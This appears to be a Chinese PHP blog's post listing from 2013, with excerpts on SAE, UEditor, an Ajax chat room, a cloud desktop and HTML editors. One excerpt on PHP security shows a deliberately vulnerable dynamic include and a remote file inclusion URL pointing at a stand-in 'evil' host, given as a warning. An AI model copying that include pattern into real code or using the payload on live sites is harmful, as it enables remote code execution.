-
SAE中级开发者申请[经验分享]2013.05.13 18:44
-
PHP编程安全的五点建议2013.04.26 17:47
1、动态加载问题
1234$action
=
'login'
;
if
(__isset(
$_GET
[
'act'
] ) )
$action
=
$_GET
[
'act'
];
require
(
$action
.
'.php'
);
这个代码相当危险,攻击者有可能可以干这些事:
/test.php?act=http://evil/exploit - 注入远程机器上有漏洞的
-
SAE平台整合UEditor2013.04.21 15:07
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于BSD协议,允许自由使用和修改代码,功能丰富,使用起来也比较方便。大部分代码为前端代码,所以整合到SAE平台,只需要修改附件、图片上传处理的PHP处理脚本。这里选用的是UEditor最新ueditor1_2_5_1-utf8-php版本。
打开php/fileUp.php文件,此文件为文件上传处理文件,将里边代码全部注释,
-
PHP打造多人在线聊天室[二]2013.04.14 15:16
第一篇帖子PHP打造多人在线聊天室[一]已经简单介绍了程序的基本功能。
但是还存在一个比较严重的Bug,在网络时延较大的情况下,会出现信息的重复显示。
问题为何出现?
在用户点击提交按钮的时候,会发送ajax请求,把用户输入的信息提交给服务器。
因为有另一个请求新信息的定时器开着,在网络时延较大的情况下,会出现当一条数据请求但还未输出在页面的时候,同样的数据会再次被请求,所以会出现信息的重复显示。
对这一问题进行了更正。
Index.js中
解决方案
-
PHP打造多人在线聊天室[一]2013.04.07 04:04
Ajax异步传输可实现无刷新更新页面内容,加上php可轻松实现多人网页聊天室,类似QQ群聊功能。
思路
|- 用户第一次访问站点,提示输入一用户名作为自己的昵称.
|- 只需判断一下用户cookie是否保存,我采用了js的设置cookie和获取cookie。具体代码可参考w3c手册
用户输入一用户名后,即可参与聊天,布局类似QQ聊天框
对显示聊天信息的div,在页面第一次加载时,主要发送ajax请求服务器文件,获取数据库所有信息,显示在div下的
-
打造个人专属云桌面2013.03.30 05:04
云桌面,基于分布式云计算存储技术,集成互联网精华应用,依托高度加密算法,为互联网各个层次用户提供最简便、最丰富、最安全、最贴心的服务。此处只是精简了云桌面的“应用添加 ”等功能,仿照WEBQQ界面设计,采用PHP+smarty,依靠cookie存储应用信息完成。
功能列表
前台
普通用户
1234|- 用户登录
|- 用户注册
|- 用户密码修改
|- 用户注销
应用
123456|- 应用市场
|- 应用基本操作[最大化、最小化、打开、关闭]
|- 应用搜
-
HTML编辑器原理剖析2013.03.13 14:15
HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用编辑器把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。大部分编辑器 使用 JavaScript 编写,可以无缝地与 Java、.NET、PHP、ASP 等程序集成,比较适合在 CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。
编辑器一种比较简单的做法就是使IFrame可写,用作编辑框。
例如:在页面中有一ID为'Html